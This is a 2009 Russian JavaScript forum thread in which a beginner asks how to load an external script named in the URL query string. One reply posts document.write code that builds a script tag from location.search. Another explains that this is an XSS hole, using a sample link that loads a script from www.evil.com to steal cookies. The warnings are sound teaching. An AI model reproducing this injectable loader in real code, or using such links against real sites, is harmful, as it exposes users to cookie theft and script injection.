Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 23.01.2009, 15:32
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Загрузка внешнего скрипта...
Раньше нужно было загружать только один внешний скрипт... и все было гуд...

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>


теперь появилась необходимость загружать больше, первое, что пришло в голову - взять данные из url'а

www.name.ru/index.htm?1001

<script language="JavaScript">
url=location.search.substring(location.search.lastIndexOf("?")+1,location.search.length);
</script>


1001 - номер нужного скрипта получили, а вот как сделать, что бы загрузился внешний скрипт с таким и менем?

помогите новичку... хелп...
Ответить с цитированием
  #2 (permalink)  
Старый 23.01.2009, 16:10
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

ты создал уязвимость своими руками: это потенциальный xss с огромной функцилнальностью...
Ответить с цитированием
  #3 (permalink)  
Старый 23.01.2009, 16:44
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от ZoNT Посмотреть сообщение
ты создал уязвимость своими руками: это потенциальный xss с огромной функцилнальностью...
а в чем тут уязвимость?
Ответить с цитированием
  #4 (permalink)  
Старый 23.01.2009, 16:45
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Возможность передать в адресной строке, какой скрипт подключить.

По теме: задача-то какая?
Ответить с цитированием
  #5 (permalink)  
Старый 23.01.2009, 17:00
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от Kolyaj Посмотреть сообщение
Возможность передать в адресной строке, какой скрипт подключить.

По теме: задача-то какая?
раньше была ссылка на документ... в документе прописывался внешний скрипт.
Он был один, теперь нужно загружать несколько, вот решил через url это сделать.
добавил в ссылку знак вопроса и номер нужного скрипта.
На странице номер нужного скрипта после вопросика получил, а вот как его в строку вставить незнаю.

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>

чтобы вместо 1000.js загружался скрипт имя которого будет стоять в url'е после вопросика...
Ответить с цитированием
  #6 (permalink)  
Старый 23.01.2009, 17:03
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

<script language="JavaScript">
var url=location.search.substring(1,location.search.length);
document.write('<script TYPE="text/javascript" src="'+url+'.js"><\/script>')
</script>

но не надо так делать!!!
Ответить с цитированием
  #7 (permalink)  
Старый 23.01.2009, 17:13
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от ZoNT Посмотреть сообщение
<script language="JavaScript">
var url=location.search.substring(1,location.search.length);
document.write('<script TYPE="text/javascript" src="'+url+'.js"><\/script>')
</script>

но не надо так делать!!!
а как можно по другому это сделать?
и в чем опасность?
насколько я знаю xss это с кукисами связано...
Ответить с цитированием
  #8 (permalink)  
Старый 23.01.2009, 17:16
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

xss - межсайтовый скриптинг.
Почему плохо:
www.name.ru/index.htm?http://www.evil.com/script
И всё... По этой ссылке на твою страничку вставится скрипт http://www.evil.com/script.js и сделает что угодно (сворует куки, покажет порнорекламу и т.д.)
Ответить с цитированием
  #9 (permalink)  
Старый 23.01.2009, 17:17
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Что значит
Сообщение от viliv
теперь нужно загружать несколько
Несколько скриптов одновременно нужно загрузить, по отдельности или еще как?
Ответить с цитированием
  #10 (permalink)  
Старый 23.01.2009, 17:21
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от Kolyaj Посмотреть сообщение
Что значит
Несколько скриптов одновременно нужно загрузить, по отдельности или еще как?
нет какойто один, просто нехочу делать кучу одинаковых страниц, а так будет одна но скрипт откроет тот номер которого будет в урле.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Остановить выполнение скрипта Nonam Общие вопросы Javascript 22 04.05.2009 01:45
Загрузка скрипта с локального комьютера uncher AJAX и COMET 49 04.02.2009 23:12
Исполнение PHP скрипта AJAXом KiTaeZa AJAX и COMET 1 19.12.2008 17:39
подключение стороннего js скрипта friend Общие вопросы Javascript 2 24.05.2008 19:51
Простой вопрос - надо из скрипта перейти на ссылку Brother Общие вопросы Javascript 1 27.02.2008 09:50